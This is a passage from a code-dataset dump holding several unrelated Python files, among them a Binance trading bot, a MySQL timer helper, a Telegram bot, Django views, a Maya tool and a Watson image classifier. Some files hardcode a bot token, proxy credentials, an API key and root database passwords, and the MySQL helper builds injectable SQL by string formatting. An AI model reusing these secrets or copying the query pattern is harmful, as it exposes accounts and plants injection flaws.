BinacePublic()\n lst_candles = binance.getKlineCandles(self.pair, self.interval, None, None, 25)\n\n # Convert to list of standard OHLC\n lstOHLC = []\n for candle in lst_candles:\n ohlc = candle.ohlc\n lstOHLC.append(ohlc)\n\n # Get SDEV\n tc = Indicators()\n lstOHLC = tc.getMFI(lstOHLC, 20)\n lstOHLC.reverse()\n now = datetime.now()\n\n self.updatePrice(lstOHLC[0].close)\n self.current_stdev = lstOHLC[0].stdev\n self.current_mean = lstOHLC[0].mean\n\n # Log current values\n self.logger.info(\n self.id + \" Current status:{}, Price:{}, Mean:{}, STDEV:{},Lower BB Band:{}\".format(self.status, str(\n self.current_price), str(self.current_mean), str(self.current_stdev), str(\n self.current_mean - 2 * self.current_stdev)))\n\n if self.status == 'SEARCHING' and self.current_price < self.current_mean - self.current_stdev * 2.5:\n self.status = \"BUY_WATCH\"\n self.buy_watch_lowest_price = self.current_price\n self.logger.info(\n \"Status changed to BUY_WATCH, current price: {}, Standard Deviation: {}, Mean {}\".format(\n str(self.current_price), str(lstOHLC[0].stdev), str(lstOHLC[0].mean)))\n return\n\n if self.status == 'SEARCHING' and lstOHLC[0].open - self.current_price > self.current_mean - self.current_stdev * 2.25:\n self.status = \"BUY_WATCH\"\n self.buy_watch_lowest_price = self.current_price\n self.logger.info(\n \"Status changed to BUY_WATCH, current price: {}, Standard Deviation: {}, Mean {}\".format(\n str(self.current_price), str(lstOHLC[0].stdev), str(lstOHLC[0].mean)))\n return\n\n if self.status == \"BUY_WATCH\" and self.current_price < self.buy_watch_lowest_price:\n self.buy_watch_lowest_price = self.current_price\n return\n\n if self.status == \"BUY_WATCH\" and self.current_price > self.buy_watch_lowest_price *1.01 :\n self.buy(\"current price is more than previous price\")\n\n # TODO: when bot is stopped and status = \"BUY_WATCH\" change status to searching\n # if no open transaction then change status to searching\n\n except:\n self.logger.exception(\"Error occured in TradingBot>checkForBuy_SDEV\")\n\n def checkforSell(self):\n try:\n logging.debug(\"Inside TradingBot>checkforSell\")\n if self.status != \"OPEN\":\n 
self.addDeicsionLog(\"ERROR\", \"No transaction to close\")\n return\n\n # Update current price\n binance = BinacePublic()\n # self.updatePrice(binance.getAveragePrice(self.pair))\n self.updatePrice(binance.getLatestPrice(self.pair))\n\n # If price falls below stop loss price then sell\n if self.current_price < self.current_stop_loss_price:\n self.addDeicsionLog(\"SELL\", \"Current price falls below Stop loss price\")\n self.sell(\"Current price falls below Stop loss price\")\n return\n\n # If price crosses take profit then enable trailing stop loss\n if (\n self.trailing_stop_loss_enabled is None or self.trailing_stop_loss_enabled == False) and self.current_price > self.current_take_profit_price:\n self.trailing_stop_loss_enabled = True\n self.current_stop_loss_price = self.current_price\n #self.current_stop_loss_price = self.current_price * (100 - self.trailing_Stop_loss) / 100\n self.addDeicsionLog(\"HOLD\",\n \"Trailing stoploss enabled,take_profit=\" + str(self.current_take_profit_price))\n return\n\n # If Trailing stop loss is enabled then update current stop loss price based on current price\n if self.trailing_stop_loss_enabled == True and self.current_price > self.previous_price:\n tmp_stop_loss_price = self.current_price * (100 - self.trailing_Stop_loss) / 100\n if tmp_stop_loss_price > self.current_stop_loss_price:\n self.current_stop_loss_price = tmp_stop_loss_price\n self.addDeicsionLog(\"HOLD\", \"Reset stoploss price to \" + str(self.current_stop_loss_price))\n return\n except:\n self.logger.exception(\"Error occured in TradingBot>chekForSell\")\n\n def updatePrice(self, current_price):\n if self.current_price == None:\n self.previous_price = current_price\n self.current_price = current_price\n else:\n self.previous_price = self.current_price\n self.current_price = current_price\n\n def sell(self, sell_reason):\n try:\n self.logger.debug(\"Inside TradingBot>Sell\")\n self.logger.info(\"SELL action , current price:\" + str(self.current_price))\n self.logger.info(\"SELL Reason:\" + sell_reason)\n\n # Execute sell order and get actual sell price\n bp = BinancePrivate()\n order_response = bp.order_market_sell(self.pair,self.base_quantity)\n sell_price = order_response[\"average_price\"]\n\n # Calculate current amount based on current price\n self.base_quantity = None\n self.current_transaction.closeTransaction(sell_price, datetime.now(), sell_reason)\n self.current_amount = self.current_amount + self.current_transaction.final_amount\n self.logger.info(json.dumps(self.current_transaction.getDictionary()))\n\n # Send to Message Queue\n # self.sendCurrentTransaction()\n\n # Add current trasaction to log\n self.updateTransactionLog()\n self.logger.info(\"SELL action, Quantity:{}, Sell Price:{}\".format(self.current_transaction.quantity,self.current_transaction.sell_price))\n # Reset parameters\n self.current_transaction = None\n self.current_stop_loss_price = None\n self.current_take_profit_price = None\n self.trailing_stop_loss_enabled = None\n self.status = \"SEARCHING\"\n #self.publishToDesktop(self.id + \" - SELL Action\",\"Reason:{}, Current amount:{}\".format(sell_reason, sell_price))\n\n except:\n self.logger.exception(\"Error occured in TradingBot>Sell\")\n\n def updateTransactionLog(self):\n key = self.current_transaction.buy_time.strftime(Constants.STANDARD_DATE_FORMAT)\n self.dict_transaction_log[key] = self.current_transaction.getDictionary()\n\n def buy(self, buy_reason):\n try:\n self.logger.debug(\"Inside TradingBot>buy\")\n # Fetch candle stick data fron Binance API\n 
binance = BinacePublic()\n self.updatePrice(binance.getLatestPrice(self.pair))\n\n self.logger.info(\"BUY action , current price:\" + str(self.current_price))\n # Always buy with 80% of current amount to cover fees\n max_Available_for_buy = self.current_amount * 0.8\n self.base_quantity = max_Available_for_buy / self.current_price\n\n self.logger.info(\"BUY Action, Quantity: {}\".format(self.base_quantity))\n # Send request to buy\n # TODO: Add functionality to actual buy\n bp = BinancePrivate()\n order_response = bp.order_market_buy(self.pair,self.base_quantity)\n buy_price = order_response[\"average_price\"]\n self.base_quantity = order_response[\"total_quantity\"]\n\n # Get actual price\n\n # Update actualprice, currentAmpunt and status\n trans_dict = {}\n trans_dict[\"pair\"] = self.pair\n trans_dict[\"key\"] = self.pair + self.interval + datetime.now().strftime(Constants.STANDARD_DATE_FORMAT)\n trans_dict[\"quantity\"] = self.base_quantity\n trans_dict[\"buy_time\"] = datetime.now().strftime(Constants.STANDARD_DATE_FORMAT)\n #trans_dict[\"buy_price\"] = self.current_price\n trans_dict[\"buy_price\"] = buy_price\n trans_dict[\"buy_reason\"] = buy_reason\n self.current_transaction = Transaction()\n self.current_transaction.loadFromDictionary(trans_dict)\n\n self.current_amount = self.current_amount - self.base_quantity * self.current_price - self.current_transaction.buy_fees\n self.current_stop_loss_price = self.current_price * (100 - self.stop_loss) / 100\n self.current_take_profit_price = self.current_price * (100 + self.take_profit) / 100\n self.logger.info(\"BUY action , actual buy price:{}\".format( buy_price))\n self.status = \"OPEN\"\n #self.publishToDesktop(self.id + \" - BUY Action\", buy_reason)\n except:\n self.logger.exception(\"Error occured in TradingBot>buy\")\n\n def addDeicsionLog(self, decision, msg):\n decision = decision_logEntry(self.current_price, decision, msg)\n self.decision_log.append(decision)\n pass\n\n def save(self):\n try:\n # convert to JSON string\n dict = self.getDictionary()\n\n with open(self.save_file_path, 'w') as outfile:\n json.dump(dict, outfile, indent=4)\n\n # self.sendHeartBeat()\n except:\n self.logger.exception(\"Error occured in TradingBot>save()\")\n\n def getDictionary(self):\n try:\n dict = {}\n dict[\"update_time\"] = datetime.now().strftime(Constants.STANDARD_DATE_FORMAT)\n dict[\"type\"] = self.type\n dict[\"status\"] = self.status\n dict[\"base_symbol\"] = self.base_symbol\n dict[\"quote_symbol\"] = self.quote_symbol\n dict[\"interval\"] = self.interval\n dict[\"is_active\"] = self.is_active\n dict[\"initial_amount\"] = self.initial_amount\n dict[\"current_amount\"] = self.current_amount\n dict[\"base_quantity\"] = self.base_quantity\n dict[\"current_price\"] = self.current_price\n dict[\"previous_price\"] = self.previous_price\n dict[\"current_mfi\"] = self.current_mfi\n dict[\"current_stdev\"] = self.current_stdev\n dict[\"current_mean\"] = self.current_mean\n dict[\"log_file_name\"] = self.log_file_name\n\n dict[\"stop_loss\"] = self.stop_loss\n dict[\"take_profit\"] = self.take_profit\n dict[\"trailing_stop_loss\"] = self.trailing_Stop_loss\n\n if self.current_stop_loss_price is not None:\n dict[\"current_stop_loss_price\"] = self.current_stop_loss_price\n dict[\"current_take_profit_price\"] = self.current_take_profit_price\n dict[\"trailing_stop_loss_enabled\"] = self.trailing_stop_loss_enabled\n\n if self.current_transaction is not None:\n dict[\"current_transaction\"] = self.current_transaction.getDictionary()\n\n if 
self.dict_transaction_log is not None:\n                dict[\"transaction_log\"] = self.dict_transaction_log\n\n            return dict\n        except:\n            self.logger.exception(\"Error occured in TradingBot>getDictionary()\")\n\n    def publishToDesktop(self, title, msg):\n        notification.notify(\n            # title of the notification,\n            title=\"{} notification on {}\".format(title, datetime.now()),\n            # the body of the notification\n            message=msg,\n            # creating icon for the notification\n            # we need to download an icon of ico file format\n            # app_icon = \"Paomedia-Small-N-Flat-Bell.ico\",\n            # the notification stays for 50sec\n            timeout=50\n        )\n\n    def createActiveFile(self):\n        f = open(self.active_file_path, \"w\")\n        f.write(self.id)\n        f.close()\n\n    def checkActiveFile(self):\n        if os.path.exists(self.active_file_path):\n            self.is_active = True\n        else:\n            self.is_active = False\n\n    def deleteActiveFile(self):\n        os.remove(self.active_file_path)\n\n\nif __name__ == \"__main__\":\n    PATH = \"/Users/akshaykadu/PycharmProjects/Binance/venv/MessageQueue\"\n# mq = MQManager(PATH)\n# exchange = mq.getExchange(\"Binance\")\n# producer = exchange.getProducer()\n\n# TODO : Ability to start and stop Bot\n# TODO : Stop bot if loss in 3 consecutive transactions or current amount falls below 80% of initial amount\n# TODO : Rotating log file handler\n","sub_path":"TradingBot.py","file_name":"TradingBot.py","file_ext":"py","file_size_in_byte":29998,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"127266498","text":"__author__ = [\"nawook96(신동욱)\", \"JHyunB(백종현)\"]\n'''\n 분포를 통해 랜덤 배열을 만들고 계산 후 파일 입출력.\n'''\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\nmean = 0 #평균\nstd = 5 #표준편차\narr1 = np.random.normal(mean, std, [5, 5]) #정규분포\narr2 = np.random.exponential(2, [5, 5]) #지수분포\narr3 = arr1 * arr2\nprint(arr3)\nnp.save(\"./data\", arr3) # data.npy로 저장\n\narr = np.load(\"./data.npy\") # 불러오기\ndevArr = np.vsplit(arr, 5) # 가로로 자르기\nprint(devArr[0][0])\nplt.plot(devArr[0][0]) # 그래프그리기\nplt.show()\n","sub_path":"1week/백종현, 신동욱_01_numpy.py","file_name":"백종현, 신동욱_01_numpy.py","file_ext":"py","file_size_in_byte":650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"460144912","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nimport pymysql\nimport time\n\nfrom .redis_timers import RedisTimer\n\ndict_hour = {'00': 'zero', '01': 'one', '02': 'two', '03': 'three', '04': 'four', '05': 'five', '06': 'six',\n             '07': 'seven', '08': 'eight', '09': 'nine', '10': 'ten', '11': 'eleven', '12': 'twelve', '13': 'thirteen',\n             '14': 'fourteen', '15': 'fifteen', '16': 'sixteen',\n             '17': 'seventeen', '18': 'eighteen', '19': 'nineteen', '20': 'twenty', '21': 'twenty_one',\n             '22': 'twenty_two', '23': 'twenty_three'}\n\n\nclass Mysql:\n    def __init__(self):\n        # 打开数据库连接\n        self.db = pymysql.connect(\"localhost\", \"root\", \"root\", \"smart\", charset='utf8')\n        # 使用 cursor() 方法创建一个游标对象 cursor\n        self.cursor = self.db.cursor()\n\n    def update_timer_status(self, id, hub_id, status):\n        sql = \"UPDATE smart_timers SET status = '{}' WHERE `id` = '{}' AND `hub_id` = '{}'\".format(status, id, hub_id)\n        try:\n            self.cursor.execute(sql)\n            self.db.commit()\n        except:\n            # 发生错误时回滚\n            self.db.rollback()\n\n    def update_hour_spare(self, hub_id, column, value):\n        sql = \"UPDATE smart_hour_spare SET `{}` = '{}' WHERE `hub_id` = '{}'\".format(column, value, hub_id)\n        try:\n            self.cursor.execute(sql)\n            self.db.commit()\n        except:\n            
self.db.rollback()\n\n def reset_hour_spare(self, hub_id):\n # 直接删掉旧的记录,再重建一条记录\n sql = \"DELETE FROM smart_hour_spare WHERE `hub_id` = '{}'\".format(hub_id)\n try:\n self.cursor.execute(sql)\n self.db.commit()\n except:\n self.db.rollback()\n\n sql = \"INSERT INTO smart_hour_spare(hub_id) VALUES ('{}')\".format(hub_id)\n try:\n self.cursor.execute(sql)\n self.db.commit()\n except:\n self.db.rollback()\n\n def update_month_spare(self, hub_id, current_hour):\n column = dict_hour[current_hour]\n select_hour_sql = \"SELECT `{}` FROM smart_hour_spare WHERE `hub_id` = '{}'\".format(column, hub_id)\n try:\n self.cursor.execute(select_hour_sql)\n watt = self.cursor.fetchone()[0]\n except Exception as e:\n print(e)\n return\n # 顺便更新当前月份\n current_month = int(time.strftime('%m', time.localtime(time.time())))\n sql = \"UPDATE smart_month_spare SET `watt` = smart_month_spare.watt+'{}', `current_month` = '{}' WHERE `hub_id` = '{}'\" \\\n .format(watt, current_month, hub_id)\n try:\n self.cursor.execute(sql)\n self.db.commit()\n except Exception as e:\n print(e)\n self.db.rollback()\n\n def get_all_timer_by_status(self, status):\n sql = \"SELECT * FROM smart_timers WHERE `status` = '{}'\".format(status)\n try:\n self.cursor.execute(sql)\n results = self.cursor.fetchall()\n timer_list = []\n for row in results:\n id = row[0]\n hub_id = row[1]\n name = row[2]\n power = row[3]\n repeat = row[4]\n time = row[5]\n status = row[6]\n timer = RedisTimer(id=id, hub_id=hub_id, repeat=repeat, time=time, power=power, status=status)\n timer_list.append(timer)\n # print(\"id=%s, hub_id=%s, name=%d, power=%s, repeat=%d, time=%d, status=%d\" % (id, hub_id, name, power, repeat, time, status))\n return timer_list\n except:\n # print(\"Error: unable to fetch data\")\n return\n\n def __del__(self):\n # 关闭数据库连接\n self.db.close()\n","sub_path":"app/tools/mysql.py","file_name":"mysql.py","file_ext":"py","file_size_in_byte":3800,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"554330593","text":"from telegram.ext import Updater , CommandHandler , MessageHandler, Filters \nimport ephem\nfrom datetime import datetime, date, timedelta\n\nPROXY = {'proxy_url': 'socks5://t1.learn.python.ru:1080',\n 'urllib3_proxy_kwargs': {'username': 'learn', 'password': 'python'}}\n\nimport logging\nlogging.basicConfig(format='%(name)s - %(levelname)s - %(message)s',\n level=logging.INFO,\n filename='bot.log'\n )\n\ndef main():\n mybot = Updater(\"958204140:AAHA21y19NDgyyzTYNJH4WsqQ9mfvY1X-3c\", request_kwargs=PROXY)\n dp = mybot.dispatcher\n dp.add_handler(CommandHandler(\"next_full_moon\", greet_user))\n dp.add_handler(MessageHandler(Filters.text, talk_to_me))\n mybot.start_polling()\n mybot.idle()\n\n\ndef greet_user(bot, update):\n\n user_text = update.message.text\n user_text=user_text.split()\n user_text=user_text[1]\n print(user_text)\n a=ephem.next_full_moon(user_text)\n print(a)\n \n update.message.reply_text(f'Ближайшее полнолуние будет: {a}')\n \n\n\n\n\ndef talk_to_me(bot, update):\n user_text = update.message.text \n print(user_text)\n update.message.reply_text(user_text)\n\nmain()","sub_path":"bot_moon.py","file_name":"bot_moon.py","file_ext":"py","file_size_in_byte":1192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"263693082","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\ndef convert (string): # code to convert string to list\n li = list(string.split())\n return li\n\n\n# In[2]:\n\n\ntext = 
input(\"Enter a Sentence : \") # reads input from user\n\n\n# In[3]:\n\n\nk = [] # creating an empty list\nL = '' # creating an empty string\n\n\n# In[4]:\n\n\nk = convert(text) # converts string to list\n\n\n# In[5]:\n\n\nprint(k) # prints the converted list\n\n\n# In[6]:\n\n\n# appends 's' to 'Python', converts the list back to a string and prints it\nfor j in k:\n    if j == 'Python':\n        j = convert(j)\n        j.append('s')\n        j = ''.join(map(str,j))\n    L +=j+' '\nprint(L)\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n","sub_path":"icp1_Q3.py","file_name":"icp1_Q3.py","file_ext":"py","file_size_in_byte":681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"17217100","text":"import re\nimport sys\nimport os\nimport numpy as np\nfrom natsort import natsorted\nimport math\nsys.path.append('..')\nimport fragility\nfrom datainterface.loadpatient import LoadPat\n\n# multiprocessing unit\nfrom fragility.preprocess.filters import FilterLinearNoise\nfrom fragility.execute.singlecore.singlemvar import SingleMvar\n\n\ndef computenumwins(raweeg, winsize, stepsize, samplefreq):\n    # get number of channels and samples in the raw data\n    numchans, numsignals = raweeg.shape\n\n    # get number of samples in a window\n    numwinsamps = winsize * int(samplefreq) / 1000\n    # get number of samples in a step\n    numstepsamps = stepsize * int(samplefreq) / 1000\n\n    # get number of complete windows in raw data\n    numwins = int(\n        math.floor(\n            numsignals /\n            numstepsamps -\n            numwinsamps /\n            numstepsamps +\n            1))\n    return numwins\n\n\nif __name__ == '__main__':\n    # extract passed-in variables\n    modeltype = int(sys.argv[1])\n    patient = str(sys.argv[2]).lower()\n    winsize = int(sys.argv[3])\n    stepsize = int(sys.argv[4])\n\n    rawdatadir = str(sys.argv[5])\n    tempdatadir = str(sys.argv[6])\n    outputdatadir = str(sys.argv[7])\n\n    # use bipolar schema?\n    BIPOLAR = False\n    if BIPOLAR:\n        reference = 'bipolar'\n    else:\n        reference = None\n    ################################### 1. SET DATA, OUTPUT AND TEMPDIR ######\n    # rawdatafile and processed data files\n    datadir = os.path.join(rawdatadir)\n\n    # output file name\n    tempresultsdir = os.path.join(tempdatadir, 'mvar', patient)\n    if not os.path.exists(tempresultsdir):\n        os.makedirs(tempresultsdir)\n    metafilename = os.path.join(tempresultsdir, '_meta' + patient)\n\n    def get_tempfilename(tempfilename): return os.path.join(\n        tempresultsdir, tempfilename)\n\n    ################################### 2. EXTRACT DATA AND PREPROCESS #######\n    # get a list of all the sorted files in our temporary directory\n    tempfiles = os.listdir(tempresultsdir)\n    tempfiles = natsorted(tempfiles)\n\n    # load raw data and other relevant channel data\n    dataloader = LoadPat(patient=patient, datadir=rawdatadir)\n    rawdata = dataloader.loadrawdata_fromfile(reference=reference)\n    included_chans = dataloader.included_chans\n    chanlabels = dataloader.chanlabels[dataloader.included_chans]\n    samplerate = dataloader.samplerate\n\n    # instantiate a mvarmodel object\n    mvarmodel = SingleMvar(winsize, stepsize, samplerate)\n    mvarmodel.settempdir(tempresultsdir)\n\n    ###################### 1b. 
PREPROCESS FILTERING ####################\n freqrange = [0.1, 499] # FREQ RANGE TO BANDPASS\n linefreq = 60 # LINE NOISE OF HZ IN USA\n noisemodel = FilterLinearNoise(samplerate=samplerate)\n # seegts = noisemodel.filter_rawdata(seegts, freqrange)\n rawdata = noisemodel.notchlinenoise(rawdata, freq=linefreq)\n\n savemeta = True\n try:\n tempfiles.remove('_meta' + patient + '.npz')\n # savemeta = False\n except BaseException:\n sys.stdout.write('cant remove metafilename')\n\n # COMPUTE REST OF WINDOWS\n # compute number of windows based on the time series data\n numwins = computenumwins(rawdata, winsize, stepsize, samplerate)\n if numwins != len(tempfiles) - 1: # and len(tempfiles) >= numwins - 200:\n # if numwins does not match, get list of wins not completed\n totalwins = np.arange(0, numwins, dtype='int')\n tempfiles = np.array(tempfiles)[:, np.newaxis]\n\n # patient+'_'+str(iwin) = the way files are named\n tempwins = np.apply_along_axis(\n lambda a: int(\n a[0].split(\n patient +\n '_')[1].split('.')[0]),\n 1,\n tempfiles)\n winstoanalyze = list(set(totalwins) - set(tempwins))\n\n # loop through windows still needed to analyze\n for iwin in winstoanalyze:\n # temporary filename to be saved for mvar run\n outputfilename = get_tempfilename(\n patient + '_' + str(iwin) + '.npz')\n adjmat = mvarmodel.runmvarsingle(rawdata, iwin, normalize=False)\n\n if iwin == 0 or savemeta:\n # save the timepoints, included channels used, parameters\n np.savez(metafilename, chanlabels=chanlabels,\n timepoints=mvarmodel.timepoints,\n winsize=winsize,\n stepsize=stepsize,\n includedchans=included_chans,\n samplerate=samplerate)\n sys.stdout.write('Saved meta data for ' + patient)\n\n # save adjacency matrix\n np.savez(outputfilename, adjmat=adjmat)\n sys.stdout.write('Saved single core mvar model ' + str(iwin))\n","sub_path":"__old/bin/fixjobs/_slurm_run_mvarmodel.py","file_name":"_slurm_run_mvarmodel.py","file_ext":"py","file_size_in_byte":4784,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"114872829","text":"# -*- coding: utf-8 -*- \nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\nfrom django.shortcuts import get_object_or_404\nfrom django.core.files.storage import FileSystemStorage\nfrom rest_framework.parsers import MultiPartParser, FileUploadParser,FormParser\nfrom rest_framework import status, generics, permissions, viewsets\nfrom mail import send_mail\n\n\nfrom .serializers import *\n\nfrom .models import *\nfrom django.shortcuts import render\n\nfrom main_page.models import CompanyInformation\nfrom main_page.serializers import Comp_Inf_Serializer\n\n# Create your views here.\nclass Profile_SupplierView(APIView):\n def get(self, request):\n objects = Profile_Supplier.objects.all()\n serializer = Profile_Supplier_Serializer(objects, many=True)\n return Response({\"profile-supplier\": serializer.data})\n\n def post(self, request):\n objects = request.data.get('profile-supplier')\n serializer = Profile_Supplier_Serializer(data=objects)\n if serializer.is_valid(raise_exception=True):\n serializer.save()\n body = ' Наименование компаний: '+serializer.data.get('company_name') + '\\n Вид деятелности: '+ serializer.data.get('type_activity') + ' \\n Страна-производитель: '+ serializer.data.get('country') + ' \\n ФИО: '+ serializer.data.get('fio') + ' \\n Телефон: '+ serializer.data.get('phone') + ' \\n E-mail: ' + serializer.data.get('mail') + ' \\n Коментарий: ' + serializer.data.get('comment') + ' \\n'\n 
send_mail(\"Заявка от сайта (Поставщик)\",body,False,'', None)\n # article_saved = serializer.save()\n return Response({\"success\": \"Created successfully\"})\n\nclass Profile_SubSupplierView(APIView):\n def get(self, request):\n objects = Profile_SubSupplier.objects.all()\n serializer = Profile_SubSupplier_Serializer(objects, many=True)\n return Response({\"profile-sub-supplier\": serializer.data})\n\n def post(self, request):\n objects = request.data.get('profile-sub-supplier')\n serializer = Profile_SubSupplier_Serializer(data=objects)\n if serializer.is_valid(raise_exception=True):\n serializer.save()\n body = ' Наименование компаний: '+serializer.data.get('company_name') + '\\n Вид деятелности: '+ serializer.data.get('type_activity') + ' \\n ФИО: '+ serializer.data.get('fio') + ' \\n Телефон: '+ serializer.data.get('phone') + ' \\n E-mail: ' + serializer.data.get('mail') + ' \\n Коментарий: ' + serializer.data.get('comment') + ' \\n'\n send_mail(\"Заявка от сайта (Cубдподрядчик)\",body,False,'', None)\n # article_saved = serializer.save()\n return Response({\"success\": \"Created successfully\"}) \n\nclass getPartnersPage(APIView):\n permission_classes = ()\n def get(self,request, *args, **kwargs):\n company_inf = CompanyInformation.objects.first()\n result = {} \n result['comp_inf'] = {'id': company_inf.id, 'phone': company_inf.phone, 'mail':company_inf.mail, 'address': {'ru': company_inf.address_rus, 'kaz': company_inf.address_kaz, 'eng': company_inf.address_eng}}\n\n return Response(result, status=status.HTTP_200_OK) ","sub_path":"partners/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"138575239","text":"\"\"\"\nMirrors an object in specified manner.\nDefaults to mirroring across X axis in translate.\nIn the future, I might make it so you can mirror across multiple axes.\nBut I only need this for one use, that's why I wrote it.\nDefaults to my naming convention of _l_ and _r_ \n\"\"\"\n\n__author__ = \"Alex Widener\"\n__status__ = \"Development\"\n__copyright__ = \"Alex Widener\"\n__email__ = \"alexwidener # gm\"\n__website__ = \"alexwidener.com\"\n\n\nimport traceback\nfrom PySide import QtCore, QtGui\nfrom shiboken import wrapInstance\nimport pymel.core as pm\nimport maya.OpenMayaUI as omui\n\ndef showui():\n main_window_ptr = omui.MQtUtil.mainWindow()\n return wrapInstance(long(main_window_ptr), QtGui.QWidget)\n\nclass AwMirrorObjectXform(QtGui.QDialog):\n\n def __init__(self, parent=showui()):\n super(AwMirrorObjectXform, self).__init__(parent)\n\n def _start(self):\n self.setWindowTitle(\"Mirror Corresponding Object\")\n self.setWindowFlags(QtCore.Qt.Tool)\n\n self._controls()\n self._layout()\n self._connections()\n \n def _controls(self):\n \n self.sel_obj_text = QtGui.QLineEdit(\"\")\n self.update_button = QtGui.QPushButton(\"Update Selected Object\")\n self.mirror_button = QtGui.QPushButton(\"Mirror Object\")\n\n self.axis_label = QtGui.QLabel(\"Axis to mirror across:\")\n self.x_rb = QtGui.QRadioButton(\"X\", self)\n self.y_rb = QtGui.QRadioButton(\"Y\", self)\n self.z_rb = QtGui.QRadioButton(\"Z\", self)\n self.x_rb.setChecked(True)\n\n self.search_label = QtGui.QLabel(\"Search for:\")\n self.search_text = QtGui.QLineEdit(\"_l_\")\n self.replace_label = QtGui.QLabel(\"Replace with:\")\n self.replace_text = QtGui.QLineEdit(\"_r_\")\n\n self.check_trans = QtGui.QCheckBox(\"Tr\")\n self.check_rotate = QtGui.QCheckBox(\"Ro\")\n self.check_scale 
= QtGui.QCheckBox(\"Sc\")\n self.check_trans.setChecked(True)\n\n def _layout(self):\n \n xyz_layout = QtGui.QHBoxLayout()\n xyz_layout.setContentsMargins(2, 2, 2, 2)\n \n xyz_layout.addWidget(self.x_rb)\n xyz_layout.addWidget(self.y_rb)\n xyz_layout.addWidget(self.z_rb)\n\n trans_layout = QtGui.QHBoxLayout()\n trans_layout.addWidget(self.check_trans)\n trans_layout.addWidget(self.check_rotate)\n trans_layout.addWidget(self.check_scale)\n\n main_layout = QtGui.QVBoxLayout()\n main_layout.setContentsMargins(2, 2, 2, 2)\n \n main_layout.addWidget(self.sel_obj_text)\n main_layout.addWidget(self.update_button)\n\n main_layout.addWidget(self.axis_label)\n main_layout.addLayout(xyz_layout)\n main_layout.addLayout(trans_layout)\n\n main_layout.addWidget(self.search_label)\n main_layout.addWidget(self.search_text)\n main_layout.addWidget(self.replace_label)\n main_layout.addWidget(self.replace_text)\n main_layout.addWidget(self.mirror_button)\n\n self.setLayout(main_layout)\n\n def _connections(self):\n self.update_button.clicked.connect(self.update_sel)\n self.mirror_button.clicked.connect(self.mirror_object)\n \n def mirror_object(self):\n i = 0\n checkedattr = []\n \n obj = self.sel_obj_text.text()\n searchtext = self.search_text.text()\n replacetext = self.replace_text.text()\n \n if not obj:\n pm.error(\"You need something in the Update Object box\")\n else: \n if not searchtext or not replacetext:\n pm.error(\"You need to enter something to search or replace\")\n else: \n if self.x_rb.isChecked():\n i = 0\n if self.y_rb.isChecked():\n i = 1\n if self.z_rb.isChecked():\n i = 2\n if self.check_trans.checkState():\n checkedattr.append('translate')\n if self.check_rotate.checkState():\n checkedattr.append('rotate')\n if self.check_scale.checkState():\n checkedattr.append('scale')\n\n if not checkedattr:\n pm.error(\"No attributes selected\")\n else: \n for eachattr in checkedattr:\n objA = pm.getAttr(obj + '.{0}'.format(eachattr))\n objMirror = obj.replace(searchtext, replacetext)\n pm.select(objMirror)\n e = objMirror + '.{0}'.format(eachattr) \n \n objA[i] = objA[i] * -1\n\n pm.setAttr(e, objA)\n \n def update_sel(self):\n curSel = pm.ls(sl=1)\n if len(curSel) > 1:\n pm.warning(\"Ehhhh, you have more than one object selected.\")\n elif len(curSel) == 0:\n pm.warning(\"Select something first, please.\")\n else:\n for each in curSel:\n self.sel_obj_text.setText(str(each))\n \nif __name__ == \"__main__\":\n try:\n mirrorui.deleteLater()\n except:\n pass\n mirrorui = AwMirrorObjectXform()\n\n try:\n mirrorui._start()\n mirrorui.show()\n except:\n mirrorui.deleteLater()\n traceback.print_exc()\n\n","sub_path":"ui/a_mirrorobj.py","file_name":"a_mirrorobj.py","file_ext":"py","file_size_in_byte":5372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"532734114","text":"import os\nimport secrets\nfrom PIL import Image\nfrom flask import current_app\nfrom watson_developer_cloud import VisualRecognitionV3\nimport json\n\n\ndef save_picture(bug_picture):\n random_hex = secrets.token_hex(8)\n _, f_ext = os.path.splitext(bug_picture.filename)\n picture_fn = random_hex + f_ext\n picture_path = os.path.join(current_app.root_path, 'static/bug_pics', picture_fn)\n\n i = Image.open(bug_picture)\n i.save(picture_path)\n\n return picture_fn\n\ndef bug_recognition(bug_image):\n visual_recognition = VisualRecognitionV3(\n '2018-03-19',\n iam_apikey='KGSz0-fDoeCCyQQLQeWtfXro_RgjEa0PK44S5FPHNlU5')\n\n bug_path = os.path.join(current_app.root_path, 
'static/bug_pics', bug_image)\n\n with open(bug_path, 'rb') as images_file:\n classes = visual_recognition.classify(\n images_file,\n threshold='0.6',\n classifier_ids='PestRecognitionModel_39839098').result\n\n try:\n return classes['images'][0]['classifiers'][0]['classes'][0]['class']\n except:\n return 'unknown'\n","sub_path":"whatsThatPest/main/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1061,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"643020908","text":"import torch\nimport random\nimport math\nfrom collections import namedtuple\nimport numpy as np\nimport json\nimport os\nfrom datetime import datetime\nimport time\nfrom maskrcnn_benchmark.modeling.search_space import head_ss_keys, inter_ss_keys\nfrom maskrcnn_benchmark.modeling.backbone.search_space import blocks_key\nfrom maskrcnn_benchmark.engine.trainer import generate_rng\nfrom maskrcnn_benchmark.utils.comm import get_world_size, synchronize, get_rank\nfrom maskrcnn_benchmark.engine.inference import inference\nfrom maskrcnn_benchmark.data import make_data_loader\nimport torch.distributed as dist\n\n\nclass TEST_MODEL(object):\n\tdef 